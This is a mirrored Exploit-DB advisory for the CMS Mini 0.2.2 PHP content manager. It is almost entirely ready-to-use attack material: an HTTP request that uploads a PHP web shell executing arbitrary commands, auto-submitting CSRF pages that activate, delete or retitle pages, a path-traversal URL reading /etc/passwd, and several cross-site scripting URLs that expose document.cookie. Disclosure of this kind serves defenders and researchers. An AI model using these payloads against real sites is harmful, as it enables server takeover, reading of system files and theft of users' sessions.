CMS Mini 0.2.2 – Multiple Vulnerabilities

  • 作者: SANTHO
    日期: 2013-09-06
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/28128/
  • ------------------------------------------------------------------------------------------
    # Exploit Title: CMSMini - Multiple Vulnerability
    # Author: SANTHO (@s4n7h0)
    # Vendor Homepage: http://sourceforge.net/projects/cmsmini/
    # Download link:
    downloads.sourceforge.net/project/cmsmini/cmsmini/cmsmini-0.2.2/cmsmini-0.2.2.tar.gz
    # Category: CMS/Webapps/PHP
    # Version: 0.2.2 + older
    ------------------------------------------------------------------------------------------
    
    File Upload
    ^^^^^^^^^^^^^^
    URL : http://[target/IP]/cmsmini/admin/index.php?path=&op=newitem
    POST /cmsmini/admin/index.php?path=&op=newitem HTTP/1.1
    Host: 192.168.15.162
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101
    Firefox/23.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.15.162/cmsmini/admin/index.php?path=
    Cookie: PHPSESSID=in6suoa2o1q8ilrtgovjdtcl52
    Connection: keep-alive
    Content-Type: multipart/form-data;
    boundary=---------------------------219313096530417
    Content-Length: 1130
    
    -----------------------------219313096530417
    Content-Disposition: form-data; name="imagefile"; filename="cmd.php"
    Content-Type: application/octet-stream
    
    <HTML><BODY>
    <FORM METHOD="GET" NAME="myform" ACTION="">
    <INPUT TYPE="text" NAME="cmd">
    <INPUT TYPE="submit" VALUE="Send">
    </FORM>
    <pre>
    <?
    if($_GET['cmd']) {
    system($_GET['cmd']);
    }
    ?>
    </pre>
    </BODY></HTML>
    
    # The uploaded shell can be accessible http://
    [target/IP]/cmsmini/pages/cmd.php
    
    Activate Page by CSRF
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    
    <html>
    <body onload="document.form.submit();">
    <form action="http://[target/IP]/cmsmini/admin/index.php?path=&op=status&name=cmd.php&newstatus=1"
    method="GET" name="form">
    </form>
    </body>
    </html>
    
    Delete Page by CSRF
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^
    
    <html>
    <body onload="document.form.submit();">
    <form action="http://[target/IP]/cmsmini/admin/index.php?path=&op=del&name=cmd.php"
    method="GET" name="form">
    </form>
    </body>
    </html>
    
    Change Page Title by CSRF
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    
    <html>
    <body onload="document.form.submit();">
    <form action="http://[target/IP]/cmsmini/admin/save.php?what=title&path=&p=testing.html"
    method="post" name="form">
    <input type="hidden" name="content" value="HelloWorld">
    <input type="hidden" name="title" value="Changed_Title">
    </form>
    </body>
    </html>
    
    File Inclusion
    ^^^^^^^^^^^^^^^^^
    http://
    [target/IP]/cmsmini/admin/edit.php?path=&name=../../../../../etc/passwd
    
    Multiple Cross Site Scripting
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    http://
    [target/IP]/cmsmini/admin/?path=%22%20%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
    http://
    [target/IP]/cmsmini/admin/configure.php?path=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
    http://
    [target/IP]/cmsmini/admin/configure.php?path=&name=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
    http://
    [target/IP]/cmsmini/admin/edit.php?path=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E&name=testing.html
    http://
    [target/IP]/cmsmini/admin/edit.php?path=&name=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
    http://
    [target/IP]/cmsmini/admin/index.php?path=%3Cscript%3Ealert(document.cookie);%3C/script%3E
    
    
    -- 
    SANTHO
    twitter : @s4n70 <https://twitter.com/s4n7h0>